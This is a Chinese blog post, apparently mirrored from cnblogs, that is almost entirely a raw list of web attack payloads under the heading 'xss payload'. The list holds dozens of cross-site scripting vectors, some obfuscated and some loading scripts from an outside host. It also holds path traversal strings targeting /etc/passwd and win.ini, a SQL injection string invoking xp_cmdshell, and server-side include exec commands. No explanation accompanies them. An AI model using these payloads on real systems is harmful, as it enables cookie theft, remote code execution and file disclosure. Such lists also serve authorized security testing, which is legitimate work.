• xss payload


    '><script>alert(document.cookie)</script>
     ='><script>alert(document.cookie)</script>
     <script>alert(document.cookie)</script>
     <script>alert(vulnerable)</script>
     %3Cscript%3Ealert('XSS')%3C/script%3E
     <script>alert('XSS')</script>
     <img src="javascript:alert('XSS')">
     %0a%0a<script>alert("Vulnerable")</script>.jsp
     %22%3cscript%3ealert(%22xss%22)%3c/script%3e
     %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
     %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
     %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
     %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
     %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
     %3f.jsp
     %3f.jsp
     <script>alert('Vulnerable');</script>
     <script>alert('Vulnerable')</script>
     ?sql_debug=1
     a%5c.aspx
     a.jsp/<script>alert('Vulnerable')</script>
     a/
     a?<script>alert('Vulnerable')</script>
     "><script>alert('Vulnerable')</script>
     ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:inetpubwwwroot?.txt'--&&
     %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     %3Cscript%3Ealert(document. domain);%3C/script%3E&
     %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
     <IMG src="javascript:alert('XSS');">
     <IMG src=javascript:alert('XSS')>
     <IMG src=JaVaScRiPt:alert('XSS')>
     <IMG src=JaVaScRiPt:alert("XSS")>
     <IMG src=javascript:alert('XSS')>
     <IMG src=javascript:alert('XSS')>
     <IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
     <IMG src="jav ascript:alert('XSS');">
     <IMG src="jav ascript:alert('XSS');">
     <IMG src="jav ascript:alert('XSS');">
     "<IMG src=javascript:alert("XSS")>";' > out
     <IMG src=" javascript:alert('XSS');">
     <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
     <BODY BACKGROUND="javascript:alert('XSS')">
     <BODY ONLOAD=alert('XSS')>
     <IMG DYNSRC="javascript:alert('XSS')">
     <IMG LOWSRC="javascript:alert('XSS')">
     <BGSOUND src="javascript:alert('XSS');">
     <br size="&{alert('XSS')}">
     <LAYER src="http://xss.ha.ckers.org/a.js"></layer>
     <LINK REL="stylesheet" href="javascript:alert('XSS');">
     <IMG src='vbscript:msgbox("XSS")'>
     <IMG src="mocha:[code]">
     <IMG src="livescript:[code]">
     <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
     <IFRAME src=javascript:alert('XSS')></IFRAME>
     <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
     <TABLE BACKGROUND="javascript:alert('XSS')">
     <DIV STYLE="background-image: url(javascript:alert('XSS'))">
     <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
     <DIV STYLE=" expression(alert('XSS'));">
     <STYLE>@import'javasc ipt:alert("XSS")';</STYLE>
     <IMG STYLE='xss:expression(alert("XSS"))'>
     <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
     <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
     <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
     <BASE href="javascript:alert('XSS');//">
     getURL("javascript:alert('XSS')")
     a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
     <XML src="javascript:alert('XSS');">
     "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
     <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
     <IMG src="javascript:alert('XSS')"
     <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
     <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
     <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>

    勿做伸手党,勤思考,总能成就一番事业。
  • 相关阅读:
    如何使用angularjs实现文本框设置值
    如何使用angularjs实现文本框获取焦点
    electron的安装
    linux中升级jdk的方法
    linux中添加开机自启服务的方法
    liunx系统安装tomcat的方法
    liunx系统安装jdk的方法
    常用linux命令
    ResourceBundle的使用
    查看Linux系统版本的命令
  • 原文地址:https://www.cnblogs.com/X-caiji/p/11188446.html
Copyright © 2020-2023  润新知